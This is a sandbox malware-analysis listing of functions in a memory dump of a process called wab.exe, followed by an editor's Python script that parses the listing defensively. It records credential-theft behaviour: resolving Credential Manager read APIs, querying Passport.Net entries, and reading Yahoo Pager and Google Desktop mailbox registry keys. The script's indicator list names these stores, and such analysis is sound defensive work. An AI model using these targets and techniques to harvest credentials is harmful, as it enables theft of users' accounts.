                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                              • strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                              • memcpy.MSVCRT ref: 004440EB
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                              • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                              APIs
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                              • _strcmpi.MSVCRT ref: 00404518
                                                              • _strcmpi.MSVCRT ref: 00404536
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 2025310588-821077329
                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C02D
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2726666094-3614832568
                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                              • String ID:
                                                              • API String ID: 2014771361-0
                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                              APIs
                                                              • memcmp.MSVCRT ref: 00406151
                                                                • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                              • memcmp.MSVCRT ref: 0040617C
                                                              • memcmp.MSVCRT ref: 004061A4
                                                              • memcpy.MSVCRT ref: 004061C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: global-salt$password-check
                                                              • API String ID: 231171946-3927197501
                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                              • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                              • String ID:
                                                              • API String ID: 19018683-0
                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                              APIs
                                                              • memset.MSVCRT ref: 0040644F
                                                              • memcpy.MSVCRT ref: 00406462
                                                              • memcpy.MSVCRT ref: 00406475
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                              • memcpy.MSVCRT ref: 004064B9
                                                              • memcpy.MSVCRT ref: 004064CC
                                                              • memcpy.MSVCRT ref: 004064F9
                                                              • memcpy.MSVCRT ref: 0040650E
                                                                • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                              • strlen.MSVCRT ref: 0040F7BE
                                                              • _mbscpy.MSVCRT ref: 0040F7CF
                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Passport.Net\*
                                                              • API String ID: 2329438634-3671122194
                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                              APIs
                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                              • memset.MSVCRT ref: 0040330B
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                              • strchr.MSVCRT ref: 0040335A
                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                              • strlen.MSVCRT ref: 0040339C
                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                              APIs
                                                              • memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                              • API String ID: 1830152886-1703613266
                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: H
                                                              • API String ID: 2221118986-2852464175
                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                              • API String ID: 3510742995-3170954634
                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: winWrite1$winWrite2
                                                              • API String ID: 438689982-3457389245
                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: winRead
                                                              • API String ID: 1297977491-2759563040
                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004090C2
                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$_mbscpy
                                                              • String ID: smtp
                                                              • API String ID: 2625860049-60245459
                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                              APIs
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                              • memset.MSVCRT ref: 00408258
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                              Strings
                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Close$EnumOpenmemset
                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                              • API String ID: 2255314230-2212045309
                                                              • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                              • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
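Read together, the blocks above expose the credential-collection logic running inside wab.exe: advapi32.dll is loaded at run time and CredReadA/CredEnumerateA/CredEnumerateW are resolved with GetProcAddress, Credential Manager is queried with the filter Passport.Net\*, and the Software\Yahoo\Pager and Software\Google\Google Desktop\Mailboxes registry keys are opened and read. Picking those patterns out of a listing this long by hand is slow, so the Python below is an added triage helper, not code from the report or from Joe Sandbox: it splits the listing at each "APIs" header, collects the API calls and string references per function block, and flags blocks that dynamically resolve a Cred* API or reference a credential-store string. The SAMPLE text is a constructed excerpt of the blocks above with most lines dropped; the indicator tables and the meaning attached to each string are the editor's assumptions and are not stated by the report.

```python
"""Added triage helper (not from the report): parse a Joe Sandbox function
listing into per-function blocks and flag credential-store access patterns."""
import re
from dataclasses import dataclass, field

# Constructed excerpt of the listing above; other lines of those blocks dropped.
SAMPLE = r"""
APIs
• GetClientRect.USER32(?,?), ref: 004016A3
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
APIs
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
Similarity
• String ID: Passport.Net\*
APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
Similarity
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
APIs
• memset.MSVCRT ref: 00408258
  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
Strings
• Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
Similarity
• String ID: Software\Google\Google Desktop\Mailboxes
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function ADDR: ]Func.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*(?:ref:\s*(?P<ref>[0-9A-F]{8}))?$")
# Indicator tables and meanings are the editor's assumptions, not report content.
CRED_API_NAMES = {"CredEnumerateA", "CredEnumerateW", "CredReadA", "CredReadW"}
CRED_STORE_STRINGS = {
    "Passport.Net": "Credential Manager target filter (Windows Live / Microsoft account entries)",
    r"Software\Yahoo\Pager": "Yahoo Messenger (Pager) account registry key",
    r"Google Desktop\Mailboxes": "Google Desktop mailbox index registry key",
}
REG_READ_APIS = {"RegOpenKeyExA", "RegQueryValueExA", "RegEnumKeyExA"}

@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: str
    subcall: bool  # True for "Part of subcall function" lines

@dataclass
class Block:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    @property
    def location(self) -> str:
        """Address of the first call the function makes itself, used as its label."""
        return next((c.ref for c in self.apis if not c.subcall), "unknown")

    def add_string(self, value: str) -> None:
        value = value.strip()
        if value and value not in self.strings:  # Strings and String ID overlap
            self.strings.append(value)

def parse_blocks(text: str) -> list:
    """Split the listing at each 'APIs' header and collect calls and strings."""
    blocks, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()  # the report indents every line; indentation carries nothing
        if line in SECTIONS:
            section = line
            if line == "APIs":
                blocks.append(Block())
            continue
        if not blocks or not line.startswith("•"):
            continue
        block = blocks[-1]
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            block.apis.append(ApiCall(m["func"], m["mod"], args, m["ref"] or "", bool(m["sub"])))
        elif section == "Strings":
            head, sep, _ = line[1:].rpartition(", xrefs: ")  # "• <string>, xrefs: <addr>"
            block.add_string(head if sep else line[1:])
        elif section == "Similarity" and line.startswith("• String ID:"):
            for part in line[len("• String ID:"):].split("$"):  # strings are joined with '$'
                block.add_string(part)
    return blocks

def flag_credential_access(blocks: list) -> list:
    """Return one finding per block whose calls or strings point at a credential store."""
    findings = []
    for block in blocks:
        hits = [f"dynamically resolves {name} (ref {c.ref})"
                for c in block.apis if c.func == "GetProcAddress"
                for name in sorted(CRED_API_NAMES & set(c.args))]
        hits += [f"references {s!r}: {meaning}"
                 for s in block.strings
                 for needle, meaning in CRED_STORE_STRINGS.items() if needle in s]
        reg = {c.func for c in block.apis} & REG_READ_APIS
        if hits and reg:  # registry reads only matter next to a credential-store string
            hits.append("reads the registry via " + ", ".join(sorted(reg)))
        if hits:
            findings.append({"at": block.location, "hits": hits})
    return findings

if __name__ == "__main__":
    for finding in flag_credential_access(parse_blocks(SAMPLE)):
        print(finding["at"], *finding["hits"], sep="\n    ")
```

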